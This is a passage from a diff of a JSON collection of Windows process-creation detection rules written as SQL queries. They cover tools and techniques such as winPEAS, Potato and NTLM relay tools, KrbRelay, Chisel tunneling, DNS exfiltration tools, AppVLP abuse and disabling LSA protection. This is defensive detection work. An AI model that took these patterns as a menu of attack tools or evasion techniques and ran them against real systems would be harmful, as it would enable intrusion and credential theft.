"attack.t1566" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate cases in which archives contain ISO or IMG files and the user opens the archive and the image via clicking and not extraction" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (ParentProcessName LIKE 
'%\\\\Winrar.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\7zFM.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\peazip.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\isoburn.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PowerISO.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ImgBurn.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%taskkill%' ESCAPE '\\' AND CommandLine LIKE '% /F %' ESCAPE '\\' AND CommandLine LIKE '% /IM %' ESCAPE '\\' AND CommandLine LIKE '%ccSvcHst.exe%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_archiver_iso_phishing.yml" + "filename": "proc_creation_win_taskkill_sep.yml" }, { - "title": "Service StartupType Change Via PowerShell Set-Service", - "id": "62b20d44-1546-4e61-afce-8e175eb9473c", + "title": "Using AppVLP To Circumvent ASR File Path Rule", + "id": "9c7e131a-0f2c-4ae0-9d43-b04f4e266d43", "status": "experimental", - "description": "Detects the use of the PowerShell \"Set-Service\" cmdlet to change the startup type of a service to \"disabled\" or \"manual\"", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Application Virtualization Utility is included with Microsoft Office. 
We are able to abuse \"AppVLP\" to execute shell commands.\nNormally, this binary is used for Application Virtualization, but we can use it as an abuse binary to circumvent the ASR file path rule folder\nor to mark a file as a system file.\n", + "author": "Sreeman", "tags": [ - "attack.execution", + "attack.t1218", "attack.defense_evasion", - "attack.t1562.001" + "attack.execution" ], "falsepositives": [ - "False positives may occur with troubleshooting scripts" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR OriginalFileName = 'PowerShell.EXE') AND (CommandLine LIKE '%Set-Service%' ESCAPE '\\' AND CommandLine LIKE '%-StartupType%' ESCAPE '\\' AND (CommandLine LIKE '%Disabled%' ESCAPE '\\' OR CommandLine LIKE '%Manual%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\appvlp.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\msoasb.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_set_service_disabled.yml" + "filename": "proc_creation_win_lolbin_appvlp.yml" }, { - "title": "Serv-U Exploitation CVE-2021-35211 by DEV-0322", - "id": "75578840-9526-4b2a-9462-af469a45e767", - "status": "test", - "description": "Detects patterns as noticed in exploitation of Serv-U CVE-2021-35211 vulnerability by threat group DEV-0322", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Unquoted Service Path Reconnaissance Via Wmic.EXE", + "id": "68bcd73b-37ef-49cb-95fc-edc809730be6", + "status": "experimental", + "description": "Detects known WMI recon method to look for unquoted service paths using wmic. 
Often used by pentester and attacker enumeration scripts", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1136.001", - "cve.2021.35211" + "attack.execution", + "attack.t1047" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '%whoami%' ESCAPE '\\' AND ((CommandLine LIKE '%./Client/Common/%' ESCAPE '\\' OR CommandLine LIKE '%.\\\\Client\\\\Common\\\\%' ESCAPE '\\') OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\Serv-U.bat%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'wmic.exe' OR NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND (CommandLine LIKE '% service get %' ESCAPE '\\' AND CommandLine LIKE '%name,displayname,pathname,startmode%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2021_35211_servu.yml" + "filename": "proc_creation_win_wmic_recon_unquoted_service_search.yml" }, { - "title": "HackTool - Hashcat Password Cracker Execution", - "id": "39b31e81-5f5f-4898-9c0e-2160cfc0f9bf", + "title": "Potential SMB Relay Attack Tool Execution", + "id": "5589ab4f-a767-433c-961d-c91f3f704db1", "status": "test", - "description": "Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against", - "author": "frack113", + "description": "Detects different hacktools used for relay attacks on Windows for privilege escalation", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1110.002" + "attack.execution", + "attack.t1557.001" ], "falsepositives": [ - "Tools that use similar command line flags and values" + "Legitimate files with these rare hacktool names" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE 
'%\\\\hashcat.exe' ESCAPE '\\' OR (CommandLine LIKE '%-a %' ESCAPE '\\' AND CommandLine LIKE '%-m 1000 %' ESCAPE '\\' AND CommandLine LIKE '%-r %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%PetitPotam%' ESCAPE '\\' OR NewProcessName LIKE '%RottenPotato%' ESCAPE '\\' OR NewProcessName LIKE '%HotPotato%' ESCAPE '\\' OR NewProcessName LIKE '%JuicyPotato%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\just\\_dce\\_%' ESCAPE '\\' OR NewProcessName LIKE '%Juicy Potato%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\temp\\\\rot.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Potato.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\SpoolSample.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Responder.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smbrelayx%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ntlmrelayx%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\LocalPotato%' ESCAPE '\\') OR (CommandLine LIKE '%Invoke-Tater%' ESCAPE '\\' OR CommandLine LIKE '% smbrelay%' ESCAPE '\\' OR CommandLine LIKE '% ntlmrelay%' ESCAPE '\\' OR CommandLine LIKE '%cme smb %' ESCAPE '\\' OR CommandLine LIKE '% /ntlm:NTLMhash %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PetitPotam%' ESCAPE '\\' OR CommandLine LIKE '%.exe -t % -p %' ESCAPE '\\') OR (CommandLine LIKE '%.exe -c \"{%' ESCAPE '\\' AND CommandLine LIKE '%}\" -z' ESCAPE '\\')) AND NOT (((NewProcessName LIKE '%HotPotatoes6%' ESCAPE '\\' OR NewProcessName LIKE '%HotPotatoes7%' ESCAPE '\\' OR NewProcessName LIKE '%HotPotatoes %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_hktl_hashcat.yml" + "filename": "proc_creation_win_hktl_relay_attacks_tools.yml" }, { - "title": "Suspicious Userinit Child Process", - "id": "b655a06a-31c0-477a-95c2-3726b83d649d", - "status": "test", - "description": "Detects a suspicious child process of userinit", - "author": "Florian Roth (Nextron Systems), Samir Bousseaden (idea)", + "title": "HackTool - winPEAS Execution", + "id": 
"98b53e78-ebaf-46f8-be06-421aafd176d9", + "status": "experimental", + "description": "WinPEAS is a script that search for possible paths to escalate privileges on Windows hosts. The checks are explained on book.hacktricks.xyz", + "author": "Georg Lauenstein (sure[secure])", "tags": [ - "attack.defense_evasion", - "attack.t1055" + "attack.privilege_escalation", + "attack.t1082", + "attack.t1087", + "attack.t1046" ], "falsepositives": [ - "Administrative scripts" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\userinit.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%\\\\netlogon\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR OriginalFileName = 'explorer.exe')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'winPEAS.exe' OR (NewProcessName LIKE '%\\\\winPEASany.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winPEASany\\_ofs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winPEASx64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winPEASx64\\_ofs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winPEASx86.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winPEASx86\\_ofs.exe' ESCAPE '\\') OR (CommandLine LIKE '% applicationsinfo%' ESCAPE '\\' OR CommandLine LIKE '% browserinfo%' ESCAPE '\\' OR CommandLine LIKE '% eventsinfo%' ESCAPE '\\' OR CommandLine LIKE '% fileanalysis%' ESCAPE '\\' OR CommandLine LIKE '% filesinfo%' ESCAPE '\\' OR CommandLine LIKE '% processinfo%' ESCAPE '\\' OR CommandLine LIKE '% servicesinfo%' ESCAPE '\\' OR CommandLine LIKE '% windowscreds%' ESCAPE '\\') OR CommandLine LIKE '%https://github.com/carlospolop/PEASS-ng/releases/latest/download/%' ESCAPE '\\' OR ParentCommandLine LIKE '% -linpeas' ESCAPE '\\' OR CommandLine LIKE '% -linpeas' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_userinit_child.yml" + "filename": 
"proc_creation_win_hktl_winpeas.yml" }, { - "title": "Suspicious Execution of Shutdown", - "id": "34ebb878-1b15-4895-b352-ca2eeb99b274", - "status": "test", - "description": "Use of the commandline to shutdown or reboot windows", - "author": "frack113", + "title": "Exploiting CVE-2019-1388", + "id": "02e0b2ea-a597-428e-b04a-af6a1a403e5c", + "status": "stable", + "description": "Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1529" + "attack.privilege_escalation", + "attack.t1068" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\shutdown.exe' ESCAPE '\\' AND (CommandLine LIKE '%/r %' ESCAPE '\\' OR CommandLine LIKE '%/s %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\consent.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\iexplore.exe' ESCAPE '\\' AND CommandLine LIKE '% http%' ESCAPE '\\') AND (IntegrityLevel = 'System' OR (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_shutdown_execution.yml" + "filename": "proc_creation_win_exploit_cve_2019_1388.yml" }, { - "title": "LSA PPL Protection Disabled Via Reg.EXE", - "id": "8c0eca51-0f88-4db2-9183-fdfb10c703f9", + "title": "HackTool - KrbRelay Execution", + "id": "e96253b8-6b3b-4f90-9e59-3b24b99cf9b4", "status": "experimental", - "description": "Detects the usage of the \"reg.exe\" utility to disable PPL protection on the LSA process", + "description": "Detects the use of KrbRelay, a Kerberos relaying tool", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.010" + "attack.credential_access", + "attack.t1558.003" ], 
"falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%SYSTEM\\\\CurrentControlSet\\\\Control\\\\Lsa%' ESCAPE '\\' AND CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 0%' ESCAPE '\\' AND CommandLine LIKE '% /v RunAsPPL %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\KrbRelay.exe' ESCAPE '\\' OR OriginalFileName = 'KrbRelay.exe') OR (CommandLine LIKE '% -spn %' ESCAPE '\\' AND CommandLine LIKE '% -clsid %' ESCAPE '\\' AND CommandLine LIKE '% -rbcd %' ESCAPE '\\') OR (CommandLine LIKE '%shadowcred%' ESCAPE '\\' AND CommandLine LIKE '%clsid%' ESCAPE '\\' AND CommandLine LIKE '%spn%' ESCAPE '\\') OR (CommandLine LIKE '%spn %' ESCAPE '\\' AND CommandLine LIKE '%session %' ESCAPE '\\' AND CommandLine LIKE '%clsid %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_reg_lsa_ppl_protection_disabled.yml" + "filename": "proc_creation_win_hktl_krbrelay.yml" }, { - "title": "Psexec Execution", - "id": "730fc21b-eaff-474b-ad23-90fd265d4988", - "status": "test", - "description": "Detects user accept agreement execution in psexec commandline", - "author": "omkar72", + "title": "Suspicious Binary In User Directory Spawned From Office Application", + "id": "aa3a6f94-890e-4e22-b634-ffdfd54792cc", + "status": "experimental", + "description": "Detects an executable in the users directory started from one of the Microsoft Office suite applications (Word, Excel, PowerPoint, Publisher, Visio)", + "author": "Jason Lynch", "tags": [ "attack.execution", - "attack.t1569", - "attack.t1021" + "attack.t1204.002", + "attack.g0046", + "car.2013-05-002" ], "falsepositives": [ - "Administrative scripts." 
+ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\psexec.exe' ESCAPE '\\' OR OriginalFileName = 'psexec.c'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSACCESS.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\EQNEDT32.exe' ESCAPE '\\') AND NewProcessName LIKE 'C:\\\\users\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%.exe' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\Teams.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sysinternals_psexec_execution.yml" + "filename": "proc_creation_win_office_spawn_exe_from_users_directory.yml" }, { - "title": "Potential Discovery Activity Via Dnscmd.EXE", - "id": "b6457d63-d2a2-4e29-859d-4e7affc153d1", - "status": "experimental", - "description": "Detects an attempt to leverage dnscmd.exe to enumerate the DNS zones of a domain. 
DNS zones used to host the DNS records for a particular domain.", - "author": "@gott_cyber", + "title": "Fireball Archer Install", + "id": "3d4aebe0-6d29-45b2-a8a4-3dfde586a26d", + "status": "test", + "description": "Detects Archer malware invocation via rundll32", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", "attack.execution", - "attack.t1543.003" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ - "Legitimate administration use" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\dnscmd.exe' ESCAPE '\\' AND (CommandLine LIKE '%/enumrecords%' ESCAPE '\\' OR CommandLine LIKE '%/enumzones%' ESCAPE '\\' OR CommandLine LIKE '%/ZonePrint%' ESCAPE '\\' OR CommandLine LIKE '%/info%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%InstallArcherSvc%' ESCAPE '\\')" ], - "filename": "proc_creation_win_dnscmd_discovery.yml" + "filename": "proc_creation_win_malware_fireball.yml" }, { - "title": "Wab/Wabmig Unusual Parent Or Child Processes", - "id": "63d1ccc0-2a43-4f4b-9289-361b308991ff", + "title": "Use of OpenConsole", + "id": "814c95cc-8192-4378-a70a-f1aafd877af1", "status": "experimental", - "description": "Detects unusual parent or children of the wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with bumblebee activity", + "description": "Detects usage of OpenConsole binary as a LOLBIN to launch other binaries to bypass application Whitelisting", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.execution" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Legitimate use by an administrator" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM 
logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\wab.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wabmig.exe' ESCAPE '\\')) OR (ParentProcessName LIKE '%\\\\wab.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wabmig.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'OpenConsole.exe' OR NewProcessName LIKE '%\\\\OpenConsole.exe' ESCAPE '\\') AND NOT (NewProcessName LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.WindowsTerminal%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wab_unusual_parents.yml" + "filename": "proc_creation_win_lolbin_openconsole.yml" }, { - "title": "Gpresult Display Group Policy Information", - "id": "e56d3073-83ff-4021-90fe-c658e0709e72", - "status": "experimental", - "description": "Detects cases in which a user uses the built-in Windows utility gpresult to display the Resultant Set of Policy (RSoP) information", - "author": "frack113", + "title": "Abused Debug Privilege by Arbitrary Parent Processes", + "id": "d522eca2-2973-4391-a3e0-ef0374321dae", + "status": "test", + "description": "Detection of unusual child processes by different system processes", + "author": "Semanur Guneysu @semanurtg, oscd.community", "tags": [ - "attack.discovery", - "attack.t1615" + "attack.privilege_escalation", + "attack.t1548" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\gpresult.exe' ESCAPE '\\' AND (CommandLine LIKE '%/z%' ESCAPE '\\' OR CommandLine LIKE '%/v%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR ParentProcessName 
LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\smss.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\searchindexer.exe' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'Cmd.Exe'))) AND NOT (CommandLine LIKE '% route %' ESCAPE '\\' AND CommandLine LIKE '% ADD %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_gpresult_execution.yml" + "filename": "proc_creation_win_susp_abusing_debug_privilege.yml" }, { - "title": "Remote Access Tool - NetSupport Execution From Unusual Location", - "id": "37e8d358-6408-4853-82f4-98333fca7014", - "status": "experimental", - "description": "Detects execution of client32.exe (NetSupport RAT) from an unusual location (outside of 'C:\\Program Files')", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Winnti Pipemon Characteristics", + "id": "73d70463-75c9-4258-92c6-17500fe972f2", + "status": "stable", + "description": "Detects specific process characteristics of Winnti Pipemon malware reported by ESET", + "author": "Florian Roth (Nextron Systems), oscd.community", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1574.002", + "attack.g0044" ], "falsepositives": [ - "Unknown" + "Legitimate setups that use similar flags" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\client32.exe' ESCAPE '\\' OR Product LIKE '%NetSupport Remote Control%' ESCAPE '\\' OR OriginalFileName LIKE 
'%client32.exe%' ESCAPE '\\' OR Imphash = 'a9d50692e95b79723f3e76fcf70d023e' OR Hashes LIKE '%IMPHASH=a9d50692e95b79723f3e76fcf70d023e%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%setup0.exe -p%' ESCAPE '\\' OR (CommandLine LIKE '%setup.exe%' ESCAPE '\\' AND (CommandLine LIKE '%-x:0' ESCAPE '\\' OR CommandLine LIKE '%-x:1' ESCAPE '\\' OR CommandLine LIKE '%-x:2' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_remote_access_tools_netsupport_susp_exec.yml" + "filename": "proc_creation_win_apt_winnti_pipemon.yml" }, { - "title": "Disable Windows IIS HTTP Logging", - "id": "e4ed6030-ffe5-4e6a-8a8a-ab3c1ab9d94e", + "title": "PUA - Chisel Tunneling Tool Execution", + "id": "8b0e12da-d3c3-49db-bb4f-256703f380e5", "status": "experimental", - "description": "Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union)", - "author": "frack113", + "description": "Detects usage of the Chisel tunneling tool via the commandline arguments", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.command_and_control", + "attack.t1090.001" ], "falsepositives": [ - "Unknown" + "Some false positives may occur with other tools with similar commandlines" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND (CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%section:httplogging%' ESCAPE '\\' AND CommandLine LIKE '%dontLog:true%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\chisel.exe' ESCAPE '\\' OR ((CommandLine LIKE 
'%exe client %' ESCAPE '\\' OR CommandLine LIKE '%exe server %' ESCAPE '\\') AND (CommandLine LIKE '%-socks5%' ESCAPE '\\' OR CommandLine LIKE '%-reverse%' ESCAPE '\\' OR CommandLine LIKE '% r:%' ESCAPE '\\' OR CommandLine LIKE '%:127.0.0.1:%' ESCAPE '\\' OR CommandLine LIKE '%-tls-skip-verify %' ESCAPE '\\' OR CommandLine LIKE '%:socks%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_iis_appcmd_http_logging.yml" + "filename": "proc_creation_win_pua_chisel.yml" }, { - "title": "Potential LethalHTA Technique Execution", - "id": "ed5d72a6-f8f4-479d-ba79-02f6a80d7471", + "title": "Suspicious ZipExec Execution", + "id": "90dcf730-1b71-4ae7-9ffc-6fcf62bd0132", "status": "test", - "description": "Detects potential LethalHTA technique where the \"mshta.exe\" is spwaned by an \"svchost.exe\" process", - "author": "Markus Neis", + "description": "ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file.", + "author": "frack113", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.t1218.005" + "attack.t1218", + "attack.t1202" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%/generic:Microsoft\\_Windows\\_Shell\\_ZipFolder:filename=%' ESCAPE '\\' AND CommandLine LIKE '%.zip%' ESCAPE '\\' AND CommandLine LIKE '%/pass:%' ESCAPE '\\' AND CommandLine LIKE '%/user:%' ESCAPE '\\') OR (CommandLine LIKE '%/delete%' ESCAPE '\\' AND CommandLine LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename=%' ESCAPE '\\' AND CommandLine LIKE '%.zip%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_mshta_lethalhta_technique.yml" + "filename": "proc_creation_win_hktl_zipexec.yml" }, { - "title": "Suspicious 
Schtasks Schedule Types", - "id": "24c8392b-aa3c-46b7-a545-43f71657fe98", + "title": "Cmd.EXE Missing Space Characters Execution Anomaly", + "id": "a16980c2-0c56-4de0-9a79-17971979efdd", "status": "experimental", - "description": "Detects scheduled task creations or modification on a suspicious schedule type", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Windows command lines that miss a space before or after the /c flag when running a command using the cmd.exe.\nThis could be a sign of obfuscation of a fat finger problem (typo by the developer).\n", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1053.005" - ], - "falsepositives": [ - "Legitimate processes that run at logon. Filter according to your environment" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '% ONLOGON %' ESCAPE '\\' OR CommandLine LIKE '% ONSTART %' ESCAPE '\\' OR CommandLine LIKE '% ONCE %' ESCAPE '\\' OR CommandLine LIKE '% ONIDLE %' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM%' ESCAPE '\\' OR CommandLine LIKE '%HIGHEST%' ESCAPE '\\'))))" - ], - "filename": "proc_creation_win_schtasks_schedule_type.yml" - }, - { - "title": "DNS Exfiltration and Tunneling Tools Execution", - "id": "98a96a5a-64a0-4c42-92c5-489da3866cb0", - "status": "test", - "description": "Well-known DNS Exfiltration tools execution", - "author": "Daniil Yugoslavskiy, oscd.community", - "tags": [ - "attack.exfiltration", - "attack.t1048.001", - "attack.command_and_control", - "attack.t1071.004", - "attack.t1132.001" + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE 
'%\\\\iodine.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dnscat2%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%cmd.exe/c%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/c%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/k%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/k%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/r%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/r%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/r%' ESCAPE '\\') OR (CommandLine LIKE '%/cwhoami%' ESCAPE '\\' OR CommandLine LIKE '%/cpowershell%' ESCAPE '\\' OR CommandLine LIKE '%/cschtasks%' ESCAPE '\\' OR CommandLine LIKE '%/cbitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%/ccertutil%' ESCAPE '\\' OR CommandLine LIKE '%/kwhoami%' ESCAPE '\\' OR CommandLine LIKE '%/kpowershell%' ESCAPE '\\' OR CommandLine LIKE '%/kschtasks%' ESCAPE '\\' OR CommandLine LIKE '%/kbitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%/kcertutil%' ESCAPE '\\') OR (CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r 